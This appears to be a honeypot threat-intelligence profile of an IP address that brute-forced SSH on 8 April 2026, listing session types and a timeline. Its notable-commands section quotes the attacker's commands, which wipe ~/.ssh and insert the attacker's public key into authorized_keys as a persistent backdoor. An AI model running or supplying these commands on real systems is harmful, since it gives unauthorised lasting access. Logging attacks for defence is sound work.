
129.205.2.18

Threat Confidence: 48%
Location: 🇺🇬 UG / Kampala
ASN: AS37063 · Roke Investments International
Cloud Provider:
Total Events: 285 (Top 10% by volume)
Agent Count: 1
First / Last Seen: 2026-04-08 08:10 — 2026-04-08 09:15
Attack Types: ssh:bruteforce
MITRE ATT&CK Techniques: Reconnaissance, Initial Access, Defense Evasion, Credential Access, Discovery, Command and Control
External Corroboration: Not flagged by any external feeds
Campaigns: Not associated with any campaigns
Session Forensics
scanner ×2 malware_dropper ×9 credential_harvester ×23 opportunistic_bruter ×9
Sessions: 43 (18 with login)
Avg Depth Score: 0.51
Commands Executed: 27
Files Downloaded: 9
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
03a80b21afa810682a776a7d42e5e6fb
SSH-2.0-libssh_0.11.1
Evidence Timeline
Malware Dropper f4aa9019717a w4m_seattle_01 · 2026-04-08 09:14
3 1 1 100%
Opportunistic Bruter 381e7cdd6147 w4m_seattle_01 · 2026-04-08 09:14
1 50%
Credential Harvester f5dd6dc92761 w4m_seattle_01 · 2026-04-08 09:14
1 35%
Opportunistic Bruter 09548159e1ab w4m_seattle_01 · 2026-04-08 09:12
1 50%
Malware Dropper 8af2b8faf473 w4m_seattle_01 · 2026-04-08 09:12
3 1 1 100%
Credential Harvester a1f6a02007a5 w4m_seattle_01 · 2026-04-08 09:12
1 35%
Credential Harvester 832124d1ae17 w4m_seattle_01 · 2026-04-08 09:09
1 35%
Opportunistic Bruter baf759ff1824 w4m_seattle_01 · 2026-04-08 09:07
1 50%
Malware Dropper 9d31561c6efb w4m_seattle_01 · 2026-04-08 09:07
3 1 1 100%
Credential Harvester 3f5114dc6bbd w4m_seattle_01 · 2026-04-08 09:07
1 35%
Scanner 7c03e8345313 w4m_seattle_01 · 2026-04-08 09:04
15%
Opportunistic Bruter e527d5e87c94 w4m_seattle_01 · 2026-04-08 09:02
1 50%
Malware Dropper bb3ffaba738a w4m_seattle_01 · 2026-04-08 09:01
3 1 1 100%
Credential Harvester a0ecdd1de0e6 w4m_seattle_01 · 2026-04-08 09:02
1 35%
Credential Harvester bc4af757fec9 w4m_seattle_01 · 2026-04-08 08:59
1 35%
Credential Harvester 43e830fdc297 w4m_seattle_01 · 2026-04-08 08:56
1 35%
Credential Harvester a3a87b6a6900 w4m_seattle_01 · 2026-04-08 08:54
1 35%
Malware Dropper 739a084ab71c w4m_seattle_01 · 2026-04-08 08:51
3 1 1 100%
Opportunistic Bruter 2e964d4cd314 w4m_seattle_01 · 2026-04-08 08:52
1 50%
Credential Harvester ff889a490dc9 w4m_seattle_01 · 2026-04-08 08:51
1 35%
Credential Harvester cbac9c6c9f94 w4m_seattle_01 · 2026-04-08 08:49
1 35%
Opportunistic Bruter f2b0168df60b w4m_seattle_01 · 2026-04-08 08:46
1 50%
Malware Dropper d2271d59226f w4m_seattle_01 · 2026-04-08 08:46
3 1 1 100%
Credential Harvester c3befc267f9d w4m_seattle_01 · 2026-04-08 08:46
1 35%
Credential Harvester 1764c2809cf7 w4m_seattle_01 · 2026-04-08 08:43
1 35%
Credential Harvester 50bbc21dba6c w4m_seattle_01 · 2026-04-08 08:41
1 35%
Credential Harvester 927f17cd1928 w4m_seattle_01 · 2026-04-08 08:38
1 35%
Malware Dropper 8c3426baa56c w4m_seattle_01 · 2026-04-08 08:35
3 1 1 100%
Opportunistic Bruter 8c7adb27012f w4m_seattle_01 · 2026-04-08 08:35
1 50%
Credential Harvester 9e2ebc3318fb w4m_seattle_01 · 2026-04-08 08:35
1 35%
Credential Harvester c4cd8c84f03c w4m_seattle_01 · 2026-04-08 08:33
1 35%
Scanner 6c669f10438f w4m_seattle_01 · 2026-04-08 08:30
15%
Credential Harvester 5c1f10a9fe7f w4m_seattle_01 · 2026-04-08 08:27
1 35%
Credential Harvester 79416dfe9fca w4m_seattle_01 · 2026-04-08 08:25
1 35%
Opportunistic Bruter 9a761bb617b1 w4m_seattle_01 · 2026-04-08 08:22
1 50%
Malware Dropper 52a12d69911e w4m_seattle_01 · 2026-04-08 08:22
3 1 1 100%
Credential Harvester 938118b66588 w4m_seattle_01 · 2026-04-08 08:22
1 35%
Credential Harvester 42fecce0168e w4m_seattle_01 · 2026-04-08 08:19
1 35%
Credential Harvester b76d230cf73c w4m_seattle_01 · 2026-04-08 08:17
1 35%
Opportunistic Bruter f94aaace7472 w4m_seattle_01 · 2026-04-08 08:14
1 50%
Malware Dropper 3b7644834283 w4m_seattle_01 · 2026-04-08 08:14
3 1 1 100%
Credential Harvester 86516a5088ca w4m_seattle_01 · 2026-04-08 08:14
1 35%
Credential Harvester 905789572767 w4m_seattle_01 · 2026-04-08 08:10
1 35%